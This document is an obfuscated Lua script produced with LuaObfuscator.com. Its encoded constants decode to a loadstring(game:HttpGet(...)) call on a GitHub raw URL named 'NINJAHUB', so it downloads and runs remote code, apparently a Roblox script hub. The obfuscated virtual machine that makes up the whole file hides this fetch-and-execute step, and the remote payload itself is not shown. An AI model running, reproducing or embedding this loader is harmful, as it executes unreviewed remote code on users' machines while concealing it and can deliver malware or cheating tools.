--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v20)if (v1(v20,2)==79) then v19=v0(v3(v20,1,1));return "";else local v68=0;local v69;while true do if (v68==0) then v69=v2(v0(v20,16));if v19 then local v84=0;local v85;while true do if (v84==1) then return v85;end if (v84==0) then v85=v5(v69,v19);v19=nil;v84=1;end end else return v69;end break;end end end end);local function v21(v22,v23,v24)if v24 then local v70=0 -(0 -0) ;local v71;while true do if (v70==(0 -0)) then v71=(v22/((7 -5)^(v23-1)))%((499 -(335 + 162))^(((v24-(1 + 0)) -(v23-(2 -(1 + 0)))) + (3 -2))) ;return v71-(v71%(1298 -(1086 + 211))) ;end end else local v72=(1833 -(43 + 1788))^(v23-(2 -1)) ;return (((v22%(v72 + v72))>=v72) and (1 + 0)) or (0 -0) ;end end local function v25()local v38=v1(v16,v18,v18);v18=v18 + 1 ;return v38;end local function v26()local v39,v40=v1(v16,v18,v18 + (568 -(148 + 418)) );v18=v18 + 1 + 1 ;return (v40 * 256) + v39 ;end local function v27()local v41,v42,v43,v44=v1(v16,v18,v18 + ((62 + 1525) -(288 + 1296)) );v18=v18 + 2 + 2 ;return (v44 * 16777216) + (v43 * (104567 -39031)) + (v42 * (98 + 158)) + v41 ;end local function v28()local v45=0 -0 ;local v46;local v47;local v48;local v49;local v50;local v51;while true do if (v45==(2 -(676 -(135 + 540)))) then v48=1717 -((2440 -1845) + 1121) ;v49=(v21(v47,2 -1 ,16 + 4 ) * ((988 -(436 + 550))^(1461 -(1321 + (1101 -(604 + 389)))))) + v46 ;v45=1 + 1 ;end if (v45==(1 + 1)) then v50=v21(v47,28 -7 ,24 + 7 );v51=((v21(v47,65 -33 )==(1 + (1541 -(740 + 801)))) and  -(1 + 0)) or (1395 -(59 + 1335)) ;v45=3 -0 ;end if (v45==(0 + 0)) then v46=v27();v47=v27();v45=104 -(100 + 3) ;end if (v45==(1052 -(893 + 156))) then if (v50==0) then if (v49==(1841 -(1243 + 128 + 470))) then return v51 * (1767 -(989 + 778)) ;else local v86=1976 -(215 + 1761) ;while true do if (v86==((236 + 210) -(406 + 40))) then v50=4 -3 ;v48=0 + 0 + 0 ;break;end end end elseif (v50==(6814 -4767)) then return ((v49==(0 -0)) and (v51 * ((1368 -(809 + 558))/0))) or (v51 * NaN) ;end return v8(v51,v50-(1958 -(2802 -(181 + 1686))) ) * (v48 + (v49/((9 -7)^(104 -52)))) ;end end end local function v29(v30)local v52;if  not v30 then local v73=0;while true do if (v73==(1363 -(991 + 372))) then v30=v27();if (v30==(0 -0)) then return "";end break;end end end v52=v3(v16,v18,(v18 + v30) -(1 + 0) );v18=v18 + v30 ;local v53={};for v66=2 -(1 + 0) , #v52 do v53[v66]=v2(v1(v3(v52,v66,v66)));end return v6(v53);end local v31=v27;local function v32(...)return {...},v12("#",...);end local function v33()local v54=670 -(88 + 582) ;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v54==(1223 -(503 + 718))) then v59=nil;v60=nil;v54=3;end if (v54==(389 -(239 + 147))) then v61=nil;while true do local v77=0;while true do if (v77~=(0 + 0)) then else local v87=0 -0 ;while true do if ((2 -1)~=v87) then else v77=1 -0 ;break;end if (0==v87) then if (1~=v55) then else local v110=0;local v111;while true do if (v110==0) then v111=0 + 0 ;while true do if (1==v111) then for v120=1 -0 ,v60 do local v121=0 + 0 ;local v122;local v123;local v124;while true do if (v121==0) then local v125=167 -(104 + 63) ;while true do if (v125~=(1 + 0)) then else v121=1 -0 ;break;end if (0==v125) then local v155=0;while true do if (v155==0) then v122=347 -(182 + 165) ;v123=nil;v155=1 -0 ;end if (v155~=(1 + 0)) then else v125=1;break;end end end end end if (v121~=1) then else v124=nil;while true do if (v122~=(1 + 0)) then else if (v123==(1244 -(336 + 907))) then v124=v25()~=(0 + 0) ;elseif (v123==(1 + 1)) then v124=v28();elseif (v123==(1538 -(235 + 1300))) then v124=v29();end v61[v120]=v124;break;end if (v122==0) then local v157=0 + 0 ;local v158;local v159;while true do if (v157==1) then while true do if (v158==(0 + 0)) then v159=1158 -(740 + 418) ;while true do if (v159~=(878 -(20 + 857))) then else v122=1;break;end if (0~=v159) then else local v177=0 + 0 ;while true do if ((0 + 0)==v177) then local v190=0 -0 ;while true do if (v190~=(1 + 0)) then else v177=2 -1 ;break;end if (v190==0) then v123=v25();v124=nil;v190=1;end end end if ((885 -(391 + 493))==v177) then v159=1162 -(1070 + 91) ;break;end end end end break;end end break;end if (v157~=(0 + 0)) then else v158=0;v159=nil;v157=1;end end end end break;end end end v59[1687 -(144 + 1540) ]=v25();v111=1 + 1 ;end if (v111==(0 -0)) then local v115=0;while true do if (v115~=(1 + 0)) then else v111=1;break;end if ((183 -(54 + 129))==v115) then v60=v27();v61={};v115=1;end end end if ((1 + 1)==v111) then v55=2;break;end end break;end end end if (v55==0) then local v112=0 + 0 ;while true do if (v112==(1 -0)) then v58={};v59={v56,v57,nil,v58};v112=2;end if (v112~=2) then else v55=2 -1 ;break;end if (v112==0) then v56={};v57={};v112=3 -2 ;end end end v87=1 + 0 ;end end end if (1~=v77) then else if ((2 + 0)==v55) then local v98=0 + 0 ;local v99;while true do if (v98==(0 -0)) then v99=0;while true do local v113=0 + 0 ;while true do if (v113~=(0 -0)) then else if (v99~=(1407 -(247 + 1159))) then else local v116=0;while true do if (v116==(1740 -(1404 + 336))) then for v126=383 -(200 + 182) ,v27() do v58[v126]=v27();end return v59;end end end if (v99~=(951 -(603 + 348))) then else local v117=0 -0 ;while true do if (v117~=(1285 -(1082 + 203))) then else for v128=815 -(272 + 542) ,v27() do local v129=0;local v130;local v131;local v132;local v133;while true do if (0==v129) then v130=0;v131=nil;v129=1;end if (v129==(3 -1)) then while true do if (v130~=(0 -0)) then else local v162=0;while true do if (v162~=(714 -(246 + 467))) then else v130=1 -0 ;break;end if (0==v162) then v131=0;v132=nil;v162=1;end end end if (v130==1) then v133=nil;while true do if (v131==0) then local v172=0;local v173;while true do if (v172==(0 -0)) then v173=0 -0 ;while true do if (v173~=1) then else v131=1588 -(1328 + 259) ;break;end if (v173==0) then local v191=0;while true do if (1~=v191) then else v173=2 -1 ;break;end if (v191~=(649 -(346 + 303))) then else v132=0;v133=nil;v191=1;end end end end break;end end end if ((918 -(876 + 41))==v131) then while true do if (v132~=(849 -(121 + 728))) then else v133=v25();if (v21(v133,4 -3 ,1 + 0 )==0) then local v181=434 -(209 + 225) ;local v182;local v183;local v184;local v185;local v186;local v187;while true do if (v181~=(1741 -(965 + 776))) then else v182=0 -0 ;v183=nil;v181=1;end if (v181==(797 -(465 + 330))) then v186=nil;v187=nil;v181=3;end if (v181~=1) then else v184=nil;v185=nil;v181=242 -(223 + 17) ;end if ((1 + 2)==v181) then while true do if (v182==(1022 -(400 + 622))) then local v197=0 + 0 ;while true do if (v197==(234 -(97 + 137))) then v183=0 + 0 ;v184=nil;v197=1 + 0 ;end if (v197~=1) then else v182=1 + 0 ;break;end end end if (v182==2) then v187=nil;while true do if (v183==2) then while true do if (v184~=1) then else local v200=33 -(26 + 7) ;local v201;while true do if (v200~=0) then else v201=0 -0 ;while true do if (v201~=(0 -0)) then else local v210=0 + 0 ;local v211;while true do if (v210==0) then v211=0;while true do if (v211==0) then v187={v26(),v26(),nil,nil};if (v185==(0 -0)) then local v213=0 -0 ;while true do if (v213~=(0 + 0)) then else v187[12 -9 ]=v26();v187[876 -(612 + 260) ]=v26();break;end end elseif (v185==1) then v187[1 + 2 ]=v27();elseif (v185==(1 + 1)) then v187[3 + 0 ]=v27() -((72 -(34 + 36))^16) ;elseif (v185==(2 + 1)) then local v222=0 -0 ;local v223;local v224;while true do if (v222==0) then v223=1335 -(554 + 781) ;v224=nil;v222=1;end if (v222~=(1965 -(1632 + 332))) then else while true do if ((0 + 0)~=v223) then else v224=0;while true do if (v224~=(0 + 0)) then else v187[6 -3 ]=v27() -((1878 -(401 + 1475))^16) ;v187[4]=v26();break;end end break;end end break;end end end v211=2 -1 ;end if (v211==(541 -(276 + 264))) then v201=1;break;end end break;end end end if (v201==(1 + 0)) then v184=2;break;end end break;end end end if (v184==2) then local v202=1159 -(779 + 380) ;local v203;local v204;while true do if (v202==0) then v203=394 -(352 + 42) ;v204=nil;v202=1026 -(51 + 974) ;end if ((1 + 0)==v202) then while true do if (v203~=0) then else v204=0;while true do if (1==v204) then v184=955 -(122 + 830) ;break;end if (v204==(1485 -(344 + 1141))) then local v212=0;while true do if (v212==0) then if (v21(v186,1 -0 ,2 -1 )==(1 -0)) then v187[1 + 1 ]=v61[v187[1 + 1 ]];end if (v21(v186,2,2 + 0 )==1) then v187[3]=v61[v187[1882 -(371 + 1508) ]];end v212=1483 -(140 + 1342) ;end if (v212==1) then v204=1;break;end end end end break;end end break;end end end if (v184~=(0 -0)) then else local v205=0;local v206;while true do if (v205==(0 -0)) then v206=0 + 0 ;while true do if (v206~=(2 -1)) then else v184=1;break;end if (v206==0) then v185=v21(v133,555 -(83 + 470) ,3);v186=v21(v133,9 -5 ,3 + 3 );v206=2 -1 ;end end break;end end end if ((1957 -(43 + 1911))~=v184) then else if (v21(v186,4 -1 ,36 -(28 + 5) )==1) then v187[3 + 1 ]=v61[v187[4]];end v56[v128]=v187;break;end end break;end if (v183==(0 -0)) then local v198=0;local v199;while true do if ((0 -0)==v198) then v199=0;while true do if (v199==0) then v184=0 + 0 ;v185=nil;v199=1 -0 ;end if (v199==(956 -(935 + 20))) then v183=1 + 0 ;break;end end break;end end end if (v183~=1) then else v186=nil;v187=nil;v183=1 + 1 ;end end break;end if (v182~=1) then else v185=nil;v186=nil;v182=677 -(306 + 369) ;end end break;end end end break;end end break;end end break;end end break;end if (v129~=(570 -(477 + 92))) then else v132=nil;v133=nil;v129=2;end end end for v134=1 + 0 ,v27() do v57[v134-1 ]=v33();end v117=1 + 0 ;end if (v117==(1512 -(894 + 617))) then v99=1;break;end end end break;end end end break;end end end break;end end end break;end if (v54==1) then v57=nil;v58=nil;v54=2;end if (v54==(0 + 0)) then v55=0;v56=nil;v54=676 -(57 + 618) ;end end end local function v34(v35,v36,v37)local v62=0;local v63;local v64;local v65;while true do if (v62==0) then v63=v35[1];v64=v35[2];v62=1;end if (v62==1) then v65=v35[3];return function(...)local v78=0;local v79;local v80;local v81;local v82;local v83;while true do if (v78==0) then v79=1;v80= -1;v78=1;end if (v78==2) then v83=nil;v83=function()local v88=v63;local v89=v64;local v90=v65;local v91=v32;local v92={};local v93={};local v94={};for v100=641 -(591 + 50) ,v82 do if ((v100>=v90) or ((11631 -7945)<=(4980 -2357))) then v92[v100-v90 ]=v81[v100 + ((1 + 1) -1) ];else v94[v100]=v81[v100 + 1 + 0 ];end end local v95=(v82-v90) + 1 ;local v96;local v97;while true do local v101=0;local v102;local v103;while true do if (((1815 -725)<3367) and (v101==(310 -(232 + 78)))) then v102=1684 -(1461 + 223) ;v103=nil;v101=2 -1 ;end if (((206 + 403)<((1724 + 1378) -(1568 -(79 + 131)))) and (v101==(1833 -(1502 + 330)))) then while true do if ((v102==(0 -0)) or ((5038 -(92 + 57))<(910 -(270 + 93)))) then v103=0;while true do if ((v103==(0 -0)) or ((4628 -(1092 + 257))==3867)) then local v118=0;local v119;while true do if (((6122 -(710 + 878))>1059) and ((1069 -(623 + 446))==v118)) then v119=323 -(248 + 75) ;while true do if ((((11013 -4537) -(1036 + 720))==(1563 + 3157)) and (v119==(0 + 0))) then local v138=0 + 0 ;while true do if (((444 -192)<4676) and (1==v138)) then v119=2 -1 ;break;end if ((v138==0) or ((4638 -1581)==((5136 -3372) + 2011))) then v96=v88[v79];v97=v96[1 + 0 ];v138=450 -(381 + 68) ;end end end if (((5186 -(943 + 330))==3913) and (v119==(1 + 0))) then v103=1 + 0 ;break;end end break;end end end if ((2639==2639) and (v103==1)) then if (((1031 + 611)<2830) and (v97<=2)) then if ((v97<=(1285 -(512 + 773))) or ((3128 -(511 + 14))>=(2614 + 1617))) then v94[v96[1755 -(103 + 1650) ]]=v37[v96[6 -3 ]];elseif (((1849 -((2610 -(111 + 1146)) + 295))<=(1052 + 1537 + 440)) and (v97>1)) then do return;end else local v139=0 + 0 ;local v140;local v141;local v142;while true do if ((((7438 -(502 + 37)) -4946)<(1617 + 1606)) and (1==v139)) then v142=nil;while true do if ((v140==1) or (3853==((14211 -(765 + 694)) -7864))) then v94[v141 + 1 + (223 -(194 + 29)) ]=v142;v94[v141]=v142[v96[9 -5 ]];break;end if ((v140==(0 + 0)) or ((1261 + 3260)<=((1782 -(420 + 492)) + 3067))) then local v166=1221 -(692 + 233 + 296) ;local v167;while true do if ((3587>((1719 + 11) -1117)) and (v166==(0 -0))) then v167=0 -0 ;while true do if ((v167==0) or ((457 + 712)>(5055 -(1215 + 20)))) then local v188=0 -0 ;while true do if (((8558 -4629)==3929) and (v188==(1 + 0))) then v167=571 -(352 + 218) ;break;end if ((v188==(0 + 0)) or ((12738 -8918)<=76)) then v141=v96[2 + 0 ];v142=v94[v96[3 -0 ]];v188=1 + 0 ;end end end if (((2801 -(982 + 1002))==817) and (v167==(1343 -(104 + (2762 -(767 + 757)))))) then v140=284 -(267 + 16) ;break;end end break;end end end end break;end if (((13772 -9097)==(6658 -(497 + 1486))) and (v139==(1276 -(565 + 711)))) then v140=1977 -(191 + 1786) ;v141=nil;v139=1931 -(1132 + 798) ;end end end elseif ((v97<=(12 -8)) or ((152 + 432)>=2107)) then if ((v97>3) or (3173<(1795 -(13 + 26)))) then local v143=491 -(227 + 264) ;local v144;local v145;while true do if (((2667 + 1441)>3718) and (v143==0)) then v144=0 + 0 ;v145=nil;v143=1;end if ((v143==(1275 -(870 + 404))) or (((2441 + 1386) -(78 + 362))<(3901 -(640 + 172)))) then while true do if ((v144==(352 -(193 + (433 -274)))) or ((5238 -(92 + 621))<=732)) then v145=v96[2 + 0 ];v94[v145]=v94[v145](v13(v94,v145 + (219 -(192 + 26)) ,v80));break;end end break;end end else v94[v96[2]]=v96[8 -5 ];end elseif ((v97>(16 -11)) or ((660 -217)==3303)) then v94[v96[1367 -(979 + 386) ]]();else local v148=1731 -(317 + 1414) ;local v149;local v150;local v151;local v152;local v153;local v154;while true do if (((322 + 659 + 258)>135) and (v148==(3 -1))) then v153=nil;v154=nil;v148=(3 + 1) -1 ;end if (((2625 + 1111)<=3971) and (v148==(0 -0))) then v149=0;v150=nil;v148=1 + (1094 -(17 + 1077)) ;end if (((1339 -(1143 + 193))==v148) or ((9810 -6140)>4568)) then while true do if ((v149==(1 + 1)) or (4037>=(5731 -(1342 + 85)))) then v154=nil;while true do if ((v150==((5 -3) -1)) or ((3373 + 1189)<=(110 + 1742))) then local v174=986 -(26 + 960) ;local v175;while true do if ((v174==0) or ((4834 -(104 + 988))==4426)) then v175=0 + 0 ;while true do if (((1993 + 1361)==(13561 -10207)) and (v175==(1399 -(541 + 858)))) then local v194=617 -(304 + (1365 -(972 + 80))) ;while true do if (((1652 -(2400 -(1109 + 584)))<(3194 + 40)) and ((0 + 0)==v194)) then v80=(v153 + v151) -(473 -(345 + 127)) ;v154=0 + 0 ;v194=1;end if ((v194==(1 -0)) or ((1000 + 698)>(2055 + 242))) then v175=(1 + 0) -(536 -(507 + 29)) ;break;end end end if (((3984 -(1420 + 207))==(3408 -(473 + 483 + 95))) and (v175==(1560 -(731 + 828)))) then v150=3 -1 ;break;end end break;end end end if ((v150==(1 + 1)) or (2339<=((302 -123) + 259))) then for v178=v151,v80 do local v179=0;local v180;while true do if (((5540 -3364)<((5210 -(552 + 750)) -((841 -(194 + 545)) + 605))) and (v179==((1261 + 29) -(670 + 620)))) then v180=0;while true do if (((406 + 1723)>(1130 -570)) and (v180==((634 -(632 + 2)) + 0))) then v154=v154 + (1808 -(1644 + 163)) ;v94[v178]=v152[v154];break;end end break;end end end break;end if (((0 -0)==v150) or ((6256 -(1348 + 494))<=(5632 -(524 + 1059)))) then local v176=0 + 0 ;while true do if ((v176==((5 -3) -1)) or ((2006 -(340 + 393 + 1009))>=((2709 + 2139) -(8 + 5)))) then v150=1 + 0 ;break;end if (((5630 -((712 -345) + 447))==4816) and (v176==(0 -0))) then v151=v96[1742 -(732 + 1008) ];v152,v153=v91(v94[v151](v13(v94,v151 + (1925 -(665 + 1259)) ,v96[168 -(102 + 63) ])));v176=1 + 0 ;end end end end break;end if (((1066 + 251)<=(2807 + 1263)) and (v149==(3 -2))) then local v170=0 -0 ;while true do if ((v170==(1 + 0)) or (502>=(975 + (1976 -(80 + 541))))) then v149=2;break;end if ((v170==((888 -(334 + 554)) -0)) or ((4741 -(2828 -(556 + 96)))>=4652)) then v152=nil;v153=nil;v170=1 + 0 ;end end end if ((v149==(1337 -(73 + 1264))) or (((11089 -(506 + 1384)) -(554 + 5073))<(4422 -(246 + 763)))) then local v171=0 + 0 ;while true do if ((v171==(0 + 0)) or ((649 -(288 + 141))==(1217 + 1529))) then v150=0 -0 ;v151=nil;v171=1;end if ((((6465 -(259 + 69)) -3571)>=1796) and (1==v171)) then v149=1128 -(279 + 848) ;break;end end end end break;end if (((426 + 271)==(1184 -487)) and (v148==(1 + 0))) then v151=nil;v152=nil;v148=1034 -(92 + 940) ;end end end v79=v79 + 1 ;break;end end break;end end break;end end end end;v78=3;end if (v78==1) then v81={...};v82=v12("#",...) -1 ;v78=2;end if (3==v78) then A,B=v32(v11(v83));if  not A[1] then local v104=0;local v105;while true do if (v104==0) then v105=v35[4][v79] or "?" ;error("Script error at ["   .. v105   .. "]:"   .. A[2] );break;end end else return v13(A,2,B);end break;end end end;end end end return v34(v33(),{},v17)(...);end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403413O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F546F58696E323332342F536372697074732F6D61696E2F4E494E4A4148554200083O00124O00013O00122O000100023O002001000100010003001203000300044O0005000100034O00045O00022O00063O000100012O00023O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v9(),...);end
